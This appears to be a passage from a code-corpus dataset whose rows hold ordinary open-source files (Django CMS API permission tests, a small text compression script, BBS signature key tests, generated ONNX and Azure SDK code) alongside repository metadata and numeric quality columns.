\x8aK\xdf\xcb\t<\x84\xc0\xf0\xe8-\xf8\x0b\xfc\x1d8N\xe0?\x98\xe2\xd2\xfe:\x8f\x87;3\x82\xc0\xe1/\xc1\x832\xc5\x7f\x01%\xaf}\xa0?\xa4\xe2\xd2\xe6\xfa\x1c\xb8\x1cA\xd0\xe0O\xc1_ \x11\x98\x85rd0\xd0\x1fXqywm\x06\xba\x97\xfd\xc3\n\x8cO \x04\x7f\x01\x1b\xca\xd9\xe0/P\xa6\x85\x81\xfe\x10\x8b\xab\xea+\x03x\x0b%\xa9\xa2\xdb\xbdY\x811)\xabg-\xf6\xe1\xbd\xc1\x8a\x12\xa8\xd1\x15%h\xa7\x05P\x0f\xe51 \x16u\x15q\x04\xdaP\x00\x9c\xbc\xe8:\x0c|\x03\xfc\x17\x11&\x1b\xf4x\x1cx#\x10\x08B\x07-\x02o\x04\x02A\x90 \x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11\xff\x0f\xe2G*\x19a\x16\x83;\x00\x00\x00\x00IEND\xaeB`\x82' # noqa: E501
| 1,149.537037 | 40,582 | 0.805075 | 10,008 | 62,075 | 4.985811 | 0.260392 | 0.002164 | 0.001443 | 0.002245 | 0.020261 | 0.015692 | 0.01487 | 0.012205 | 0.008557 | 0.007155 | 0 | 0.20244 | 0.008151 | 62,075 | 53 | 40,583 | 1,171.226415 | 0.607968 | 0.000338 | 0 | 0.142857 | 0 | 0.714286 | 0.742696 | 0.728449 | 0 | 1 | 0 | 0 | 0.142857 | 1 | 0.095238 | false | 0 | 0.071429 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8611c69fa6ef831457a8dbe8a56cce0b7b4729f0 | 81 | py | Python | spyder_reset_clear.py | pdubucq/gists | 77b933e66343d262e142d0c34b7e5e432d74b311 | [
"MIT"
] | null | null | null | spyder_reset_clear.py | pdubucq/gists | 77b933e66343d262e142d0c34b7e5e432d74b311 | [
"MIT"
] | null | null | null | spyder_reset_clear.py | pdubucq/gists | 77b933e66343d262e142d0c34b7e5e432d74b311 | [
"MIT"
] | null | null | null | from IPython import get_ipython
def __reset__(): get_ipython().magic('reset -sf') | 40.5 | 49 | 0.777778 | 12 | 81 | 4.75 | 0.666667 | 0.350877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 81 | 2 | 49 | 40.5 | 0.77027 | 0 | 0 | 0 | 0 | 0 | 0.109756 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
862c85085884897a5a45a50b70b1cf30b645b183 | 17,449 | py | Python | example_project/example_site/tests/test_base.py | wearehoods/djangocms-rest-api | 7ac95b683e24bfdb61a2a2d73c9d018a190d51f8 | [
"MIT"
] | 55 | 2016-08-04T19:08:01.000Z | 2020-07-27T06:43:35.000Z | example_project/example_site/tests/test_base.py | wearehoods/djangocms-rest-api | 7ac95b683e24bfdb61a2a2d73c9d018a190d51f8 | [
"MIT"
] | 14 | 2016-10-03T19:44:19.000Z | 2019-01-17T13:18:24.000Z | example_project/example_site/tests/test_base.py | wearehoods/djangocms-rest-api | 7ac95b683e24bfdb61a2a2d73c9d018a190d51f8 | [
"MIT"
] | 18 | 2016-09-30T03:20:43.000Z | 2021-03-03T07:20:01.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
from __future__ import with_statement
from django.core.cache import cache
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from cms.api import create_page, add_plugin
from cms.models import User
from filer.models import Image
from rest_framework import status
from example_site.tests.utils import CMSApiTestCase
from plugins.models import Slide
class PagesTestCase(CMSApiTestCase):
def tearDown(self):
cache.clear()
def test_page_list_unauthorised(self):
"""
Test that anonymous user and access public pages via API
"""
user = self.get_superuser()
title_1 = 'page'
title_2 = 'inner'
title_3 = 'page 3'
page = create_page(title_1, 'page.html', 'en', published=True).publisher_public
page_2 = create_page(title_2, 'page.html', 'en', published=True, parent=page).publisher_public
page_3 = create_page(title_3, 'page.html', 'en', published=False)
url = reverse('api:page-list')
response = self.client.get(url, format='json')
self.assertEqual(len(response.data), 2)
for page in response.data:
self.assertIn(page.get('title'), {title_1, title_2})
def test_page_list_admin(self):
"""
Test that admin user and access all pages via API
"""
user = self.get_superuser()
title_1 = 'page'
title_2 = 'inner'
title_3 = 'page 3'
page = create_page(title_1, 'page.html', 'en', published=True).publisher_public
page_2 = create_page(title_2, 'page.html', 'en', published=True, parent=page).publisher_public
page_3 = create_page(title_3, 'page.html', 'en', published=False)
with self.login_user_context(user):
url = reverse('api:page-list')
response = self.client.get(url, format='json')
self.assertEqual(len(response.data), 3)
for page in response.data:
self.assertIn(page.get('title'), {title_1, title_2, title_3})
class PlaceHolderTestCase(CMSApiTestCase):
def test_placeholder(self):
"""
Test that placeholder are accessible and contains required info
"""
page = create_page('page', 'page.html', 'en', published=True).publisher_public
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
response = self.client.get(url)
self.assertEqual(len(response.data['plugins']), 1)
self.assertEqual(response.data['plugins'][0], plugin.id)
def test_anonymous_cant_see_placeholder_from_draft(self):
"""
tests that user gets forbidden error if tries to load placeholder from not published page
:return:
"""
page = create_page('page', 'page.html', 'en', published=False)
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn('plugins', response.data)
def test_anonymous_cant_see_placeholder_from_page_for_authenticated_only(self):
"""
tests that user gets forbidden error if tries to load placeholder
from page which is available only to logged in users
:return:
"""
page = create_page('page', 'page.html', 'en', published=True, login_required=True).publisher_public
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn('plugins', response.data)
def test_authenticated_can_see_placeholder_from_page_for_authenticated_only(self):
"""
tests that user gets forbidden error if tries to load placeholder
from page which is available only to logged in users
:return:
"""
page = create_page('page', 'page.html', 'en', published=True, login_required=True).publisher_public
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
user = User.objects.create(username='testuser', email='testuser@example.com')
user.set_password('testuser')
self.client.force_authenticate(user)
url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('plugins', response.data)
self.assertEqual(response.data['plugins'][0], plugin.id)
def test_authenticated_cant_see_placeholder_from_drafts(self):
"""
tests that user gets forbidden error if tries to load placeholder
from page which is available only to logged in users
:return:
"""
page = create_page('page', 'page.html', 'en', published=False, login_required=True)
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
user = User.objects.create(username='testuser', email='testuser@example.com')
user.set_password('testuser')
self.client.force_authenticate(user)
url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_staff_can_not_see_placeholder_from_not_published_pages_for_authenticated(self):
"""
tests that staff user can get placeholder from invisible for others page
:return:
"""
page = create_page('page', 'page.html', 'en', published=False, login_required=True)
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
user = User.objects.create(username='testuser', email='testuser@example.com', is_staff=True)
user.set_password('testuser')
self.client.force_authenticate(user)
url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class PluginTestCase(CMSApiTestCase):
def test_plugin_detail(self):
page = create_page('page', 'page.html', 'en', published=True).publisher_public
placeholder = page.placeholders.get(slot='content')
plugin_1 = add_plugin(
placeholder, 'GoogleMapPlugin', 'en', title="Map Plugin")
url = reverse('api:plugin-detail', kwargs={'pk': plugin_1.id})
response = self.client.get(url, format='json')
self.assertEqual(response.data['plugin_type'], 'GoogleMapPlugin')
self.assertEqual(response.data['plugin_data']['title'], plugin_1.title)
def test_plugin_with_inlines(self):
page = create_page('page', 'page.html', 'en', published=True).publisher_public
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, 'SliderWithInlinesPlugin', 'en', name='Slider')
instance, plugin_model = plugin.get_plugin_instance()
image1 = SimpleUploadedFile("image.jpg", b"content")
image2 = SimpleUploadedFile("image.jpg", b"content")
slide_1 = Slide.objects.create(title='slide 1', image=image1, slider=instance)
slide_2 = Slide.objects.create(title='slide 2', image=image2, slider=instance)
url = reverse('api:plugin-detail', kwargs={'pk': plugin.id})
response = self.client.get(url, format='json')
self.assertEqual(len(response.data['inlines']), 1)
self.assertEqual(len(response.data['inlines']['slides']), 2)
self.assertIn(slide_1.image.url, response.data['inlines']['slides'][0]['image'])
def test_plugin_with_children(self):
page = create_page('page', 'page.html', 'en', published=True).publisher_public
placeholder = page.placeholders.get(slot='content')
columns = add_plugin(placeholder, "MultiColumnPlugin", "en")
column_1 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='10%')
column_2 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='30%')
text_plugin_1_1 = add_plugin(placeholder, "TextPlugin", "en", target=column_1, body="I'm the first")
text_plugin_1_2 = add_plugin(placeholder, "TextPlugin", "en", target=column_1, body="I'm the second")
text_plugin_2_1 = add_plugin(placeholder, "TextPlugin", "en", target=column_2, body="I'm the third")
url = reverse('api:plugin-detail', kwargs={'pk': columns.id})
response = self.client.get(url, format='json')
data = response.data
self.assertIn('children', data)
self.assertEqual(len(data['children']), 2)
self.assertEqual(len(data['children'][0]['children']), 2)
self.assertEqual(data['children'][0]['children'][0]['body'], text_plugin_1_1.body)
self.assertEqual(data['children'][0]['children'][1]['body'], text_plugin_1_2.body)
self.assertEqual(len(data['children'][1]['children']), 1)
self.assertEqual(data['children'][1]['children'][0]['body'], text_plugin_2_1.body)
def test_plugin_with_children_with_inlines(self):
page = create_page('page', 'page.html', 'en', published=True).publisher_public
placeholder = page.placeholders.get(slot='content')
columns = add_plugin(placeholder, "MultiColumnPlugin", "en")
column_1 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='10%')
column_2 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='30%')
column_3 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='60%')
text_plugin_1_1 = add_plugin(placeholder, "TextPlugin", "en", target=column_1, body="I'm the first")
text_plugin_1_2 = add_plugin(placeholder, "TextPlugin", "en", target=column_1, body="I'm the second")
text_plugin_2_1 = add_plugin(placeholder, "TextPlugin", "en", target=column_2, body="I'm the third")
plugin = add_plugin(placeholder, 'SliderWithInlinesPlugin', 'en', target=column_3, name='Slider')
instance, plugin_model = plugin.get_plugin_instance()
image1 = SimpleUploadedFile("image.jpg", b"content")
image2 = SimpleUploadedFile("image.jpg", b"content")
slide_1 = Slide.objects.create(title='slide 1', image=image1, slider=instance)
slide_2 = Slide.objects.create(title='slide 2', image=image2, slider=instance)
url = reverse('api:plugin-detail', kwargs={'pk': columns.id})
response = self.client.get(url, format='json')
data = response.data
self.assertIn('children', data)
self.assertEqual(len(data['children']), 3)
self.assertEqual(len(data['children'][0]['children']), 2)
self.assertEqual(data['children'][0]['children'][0]['body'], text_plugin_1_1.body)
self.assertEqual(data['children'][0]['children'][1]['body'], text_plugin_1_2.body)
self.assertEqual(len(data['children'][1]['children']), 1)
self.assertEqual(data['children'][1]['children'][0]['body'], text_plugin_2_1.body)
self.assertIn('inlines', data['children'][2]['children'][0])
self.assertIn('slides', data['children'][2]['children'][0]['inlines'])
self.assertEqual(len(data['children'][2]['children'][0]['inlines']['slides']), 2)
def test_plugin_mapping(self):
page = create_page('page', 'page.html', 'en', published=True).publisher_public
placeholder = page.placeholders.get(slot='content')
image = Image.objects.create(file=SimpleUploadedFile("image.jpg", b"content"))
plugin = add_plugin(placeholder, "FilerImagePlugin", "en", image=image)
url = reverse('api:plugin-detail', kwargs={'pk': plugin.id})
response = self.client.get(url, format='json')
data = response.data
self.assertIsNotNone(data['image'])
self.assertTrue(isinstance(data['image'], dict))
# TODO: check urls
self.assertIn(image.url, data['image']['file'])
def test_custom_serializer_detail(self):
page = create_page('page', 'page.html', 'en', published=True).publisher_public
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, 'SliderPlugin', 'en', name='Slider')
instance, plugin_model = plugin.get_plugin_instance()
image = SimpleUploadedFile("image.jpg", b"content")
image = SimpleUploadedFile("image.jpg", b"content")
slide_1 = Slide.objects.create(title='slide 1', image=image, slider=instance)
slide_2 = Slide.objects.create(title='slide 2', image=image, slider=instance)
url = reverse('api:plugin-detail', kwargs={'pk': plugin.id})
response = self.client.get(url, format='json')
self.assertIn('test', response.data)
def test_anonymous_cant_see_plugin_from_draft(self):
"""
tests that user gets forbidden error if tries to load placeholder from not published page
:return:
"""
page = create_page('page', 'page.html', 'en', published=False)
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_anonymous_cant_see_plugin_from_page_for_authenticated_only(self):
"""
tests that user gets forbidden error if tries to load placeholder
from page which is available only to logged in users
:return:
"""
page = create_page('page', 'page.html', 'en', published=True, login_required=True).publisher_public
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_authenticated_can_see_plugin_from_page_for_authenticated_only(self):
"""
tests that user gets forbidden error if tries to load placeholder
from page which is available only to logged in users
:return:
"""
page = create_page('page', 'page.html', 'en', published=True, login_required=True).publisher_public
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
user = User.objects.create(username='testuser', email='testuser@example.com')
user.set_password('testuser')
self.client.force_authenticate(user)
url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('plugin_type', response.data)
self.assertEqual(response.data['plugin_type'], 'TextPlugin')
def test_authenticated_cant_see_plugin_from_drafts(self):
"""
tests that user gets forbidden error if tries to load placeholder
from page which is available only to logged in users
:return:
"""
page = create_page('page', 'page.html', 'en', published=False, login_required=True)
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
user = User.objects.create(username='testuser', email='testuser@example.com')
user.set_password('testuser')
self.client.force_authenticate(user)
url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_staff_can_not_see_plugin_from_not_published_pages_for_authenticated(self):
"""
tests that staff user can get placeholder from invisible for others page
:return:
"""
page = create_page('page', 'page.html', 'en', published=False, login_required=True)
placeholder = page.placeholders.get(slot='content')
plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
user = User.objects.create(username='testuser', email='testuser@example.com', is_staff=True)
user.set_password('testuser')
self.client.force_authenticate(user)
url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
| 52.557229 | 109 | 0.668348 | 2,145 | 17,449 | 5.279254 | 0.087179 | 0.02402 | 0.051219 | 0.038591 | 0.883168 | 0.860297 | 0.831862 | 0.823561 | 0.815525 | 0.815525 | 0 | 0.011463 | 0.195083 | 17,449 | 331 | 110 | 52.716012 | 0.794802 | 0.076795 | 0 | 0.711297 | 0 | 0 | 0.15102 | 0.011352 | 0 | 0 | 0 | 0.003021 | 0.200837 | 1 | 0.083682 | false | 0.025105 | 0.046025 | 0 | 0.142259 | 0.004184 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86707c149d38ddb2a3dd510a091fef92893eee78 | 2,317 | py | Python | ravdec.py | mr-ravin/ravdec | f20e3cb5b09436b76da30eb671b0367d34d03aa7 | [
"MIT"
] | 2 | 2019-05-05T22:56:57.000Z | 2020-12-10T01:39:42.000Z | ravdec.py | mr-ravin/ravdec | f20e3cb5b09436b76da30eb671b0367d34d03aa7 | [
"MIT"
] | null | null | null | ravdec.py | mr-ravin/ravdec | f20e3cb5b09436b76da30eb671b0367d34d03aa7 | [
"MIT"
] | 2 | 2017-11-27T07:29:21.000Z | 2020-12-11T15:59:45.000Z | def file_compression(filename):
read_file=open(filename,'r')
read_data=read_file.read()
fname=filename.split('.')
e=fname[0]
fname=str(e)+'.rav'
wrt_file=open(fname,'w')
cnt=0
act_len=len(read_data)
multiple=int(act_len/8)
binval=""
for i in range(0,multiple):
tmp=read_data[8*i:(8*i)+8]
for j in range(0,8):
tmp2=ord(tmp[j])
tmp3=bin(tmp2)
tmp3=tmp3[2:]
while len(tmp3)<7:
tmp3='0'+tmp3
binval=binval+tmp3
while cnt< len(binval):
repl=binval[cnt:8+cnt]
wrt_data=chr(int(repl,2))
cnt=cnt+8
wrt_file.write(wrt_data)
read_file.close()
wrt_file.close()
def file_decompression(filename):
read_file=open(filename,'r')
read_data=read_file.read()
fname=filename.split('.')
e=fname[0]
fname=str(e)+'.dec'
wrt_file=open(fname,'w')
cnt=0
act_len=len(read_data)
multiple=int(act_len/7)
binval=""
for i in range(0,multiple):
tmp=read_data[7*i:(7*i)+7]
for j in range(0,7):
tmp2=ord(tmp[j])
tmp3=bin(tmp2)
tmp3=tmp3[2:]
while len(tmp3)<8:
tmp3='0'+tmp3
binval=binval+tmp3
while cnt< len(binval):
repl=binval[cnt:7+cnt]
repl='0'+repl
wrt_data=chr(int(repl,2))
cnt=cnt+7
wrt_file.write(wrt_data)
read_file.close()
wrt_file.close()
def net_compression(read_data):
return_data=""
cnt=0
act_len=len(read_data)
multiple=int(act_len/8)
binval=""
for i in range(0,multiple):
tmp=read_data[8*i:(8*i)+8]
for j in range(0,8):
tmp2=ord(tmp[j])
tmp3=bin(tmp2)
tmp3=tmp3[2:]
while len(tmp3)<7:
tmp3='0'+tmp3
binval=binval+tmp3
while cnt< len(binval):
repl=binval[cnt:8+cnt]
wrt_data=chr(int(repl,2))
cnt=cnt+8
return_data=return_data+wrt_data
return return_data
def net_decompression(read_data):
return_data=""
cnt=0
act_len=len(read_data)
multiple=int(act_len/7)
binval=""
for i in range(0,multiple):
tmp=read_data[7*i:(7*i)+7]
for j in range(0,7):
tmp2=ord(tmp[j])
tmp3=bin(tmp2)
tmp3=tmp3[2:]
while len(tmp3)<8:
tmp3='0'+tmp3
binval=binval+tmp3
while cnt< len(binval):
repl=binval[cnt:7+cnt]
repl='0'+repl
wrt_data=chr(int(repl,2))
cnt=cnt+7
return_data=return_data+wrt_data
return return_data
| 22.715686 | 36 | 0.624946 | 402 | 2,317 | 3.472637 | 0.109453 | 0.068768 | 0.045845 | 0.028653 | 0.946991 | 0.946991 | 0.946991 | 0.946991 | 0.946991 | 0.885387 | 0 | 0.052459 | 0.210186 | 2,317 | 101 | 37 | 22.940594 | 0.710383 | 0 | 0 | 0.938776 | 0 | 0 | 0.008632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0 | 0 | 0.061224 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8675323ea65ce6ab009c37363b630e3314e3018e | 258 | py | Python | pytorch/build.180/third_party/onnx/onnx/onnx_operators_pb.py | alchemy315/NoPFS | f3901e963e2301e8a6f1c7aac0511d0cf9a1889d | [
"BSD-3-Clause"
] | null | null | null | pytorch/build.180/third_party/onnx/onnx/onnx_operators_pb.py | alchemy315/NoPFS | f3901e963e2301e8a6f1c7aac0511d0cf9a1889d | [
"BSD-3-Clause"
] | null | null | null | pytorch/build.180/third_party/onnx/onnx/onnx_operators_pb.py | alchemy315/NoPFS | f3901e963e2301e8a6f1c7aac0511d0cf9a1889d | [
"BSD-3-Clause"
] | null | null | null | # This file is generated by setup.py. DO NOT EDIT!
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .onnx_operators_onnx_torch_ml_pb2 import * # noqa
| 28.666667 | 55 | 0.837209 | 38 | 258 | 5.052632 | 0.657895 | 0.208333 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004484 | 0.135659 | 258 | 8 | 56 | 32.25 | 0.856502 | 0.205426 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.2 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8695f7fc5a5fea3c79a8bfa970ad8b5370928fd5 | 1,729 | py | Python | wrappers/python/ursa_bbs_signatures/models/keys/test/test_BlindedBlsKeyPair.py | trinsic-id/ffi-bbs-signatures | 25f9872b79d8b0343cb5ee8c1c152fa6804cc162 | [
"Apache-2.0"
] | 13 | 2020-09-02T02:54:17.000Z | 2022-03-30T14:55:08.000Z | wrappers/python/ursa_bbs_signatures/models/keys/test/test_BlindedBlsKeyPair.py | trinsic-id/ffi-bbs-signatures | 25f9872b79d8b0343cb5ee8c1c152fa6804cc162 | [
"Apache-2.0"
] | 15 | 2020-08-25T10:17:46.000Z | 2022-02-28T13:29:57.000Z | wrappers/python/ursa_bbs_signatures/models/keys/test/test_BlindedBlsKeyPair.py | trinsic-id/ffi-bbs-signatures | 25f9872b79d8b0343cb5ee8c1c152fa6804cc162 | [
"Apache-2.0"
] | 8 | 2021-01-31T12:51:29.000Z | 2022-03-30T14:55:10.000Z | import unittest
from ursa_bbs_signatures import BlindedBlsKeyPair
class TestBlindedBlsKeyPair(unittest.TestCase):
def test_generate_g2_key_with_seed(self):
seed = 'just a seed'
key_pair = BlindedBlsKeyPair.generate_g2(seed)
self.assertIsNotNone(key_pair, "Key pair should not be None")
self.assertIsNotNone(key_pair.public_key, "Key pair should have public key")
self.assertIsNotNone(key_pair.secret_key, "Key pair should have secret key")
self.assertTrue(key_pair.is_g2, "Key should be G2 key")
self.assertFalse(key_pair.is_g1, "Key should NOT be G1 key")
self.assertEqual(BlindedBlsKeyPair.secret_key_size(), len(key_pair.secret_key))
self.assertEqual(BlindedBlsKeyPair.public_g2_key_size(), len(key_pair.public_key))
self.assertEqual(BlindedBlsKeyPair.blinding_factor_size(), len(key_pair.blinding_factor))
def test_generate_g1_key_with_seed(self):
seed = 'just a seed'
key_pair = BlindedBlsKeyPair.generate_g1(seed)
self.assertIsNotNone(key_pair, "Key pair should not be None")
self.assertIsNotNone(key_pair.public_key, "Key pair should have public key")
self.assertIsNotNone(key_pair.secret_key, "Key pair should have secret key")
self.assertTrue(key_pair.is_g1, "Key should be G1 key")
self.assertFalse(key_pair.is_g2, "Key should NOT be G2 key")
self.assertEqual(BlindedBlsKeyPair.secret_key_size(), len(key_pair.secret_key))
self.assertEqual(BlindedBlsKeyPair.public_g1_key_size(), len(key_pair.public_key))
self.assertEqual(BlindedBlsKeyPair.blinding_factor_size(), len(key_pair.blinding_factor))
if __name__ == '__main__':
unittest.main()
| 48.027778 | 97 | 0.737999 | 235 | 1,729 | 5.140426 | 0.174468 | 0.139073 | 0.109272 | 0.129139 | 0.846026 | 0.846026 | 0.764901 | 0.764901 | 0.764901 | 0.764901 | 0 | 0.009749 | 0.169462 | 1,729 | 35 | 98 | 49.4 | 0.831476 | 0 | 0 | 0.444444 | 1 | 0 | 0.171197 | 0 | 0 | 0 | 0 | 0 | 0.592593 | 1 | 0.074074 | false | 0 | 0.074074 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
86a970638203f62b1fd9fded741fe3459f24a9c9 | 52,738 | py | Python | sdk/edgegateway/azure-mgmt-edgegateway/azure/mgmt/edgegateway/operations/devices_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/edgegateway/azure-mgmt-edgegateway/azure/mgmt/edgegateway/operations/devices_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/edgegateway/azure-mgmt-edgegateway/azure/mgmt/edgegateway/operations/devices_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class DevicesOperations(object):
"""DevicesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The API version. Constant value: "2019-03-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2019-03-01"
self.config = config
def list_by_subscription(
self, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets all the data box edge/gateway devices in a subscription.
:param expand: Specify $expand=details to populate additional fields
related to the resource or Specify $skipToken=<token> to populate the
next page in the list.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of DataBoxEdgeDevice
:rtype:
~azure.mgmt.edgegateway.models.DataBoxEdgeDevicePaged[~azure.mgmt.edgegateway.models.DataBoxEdgeDevice]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.DataBoxEdgeDevicePaged(internal_paging, self._deserialize.dependencies)
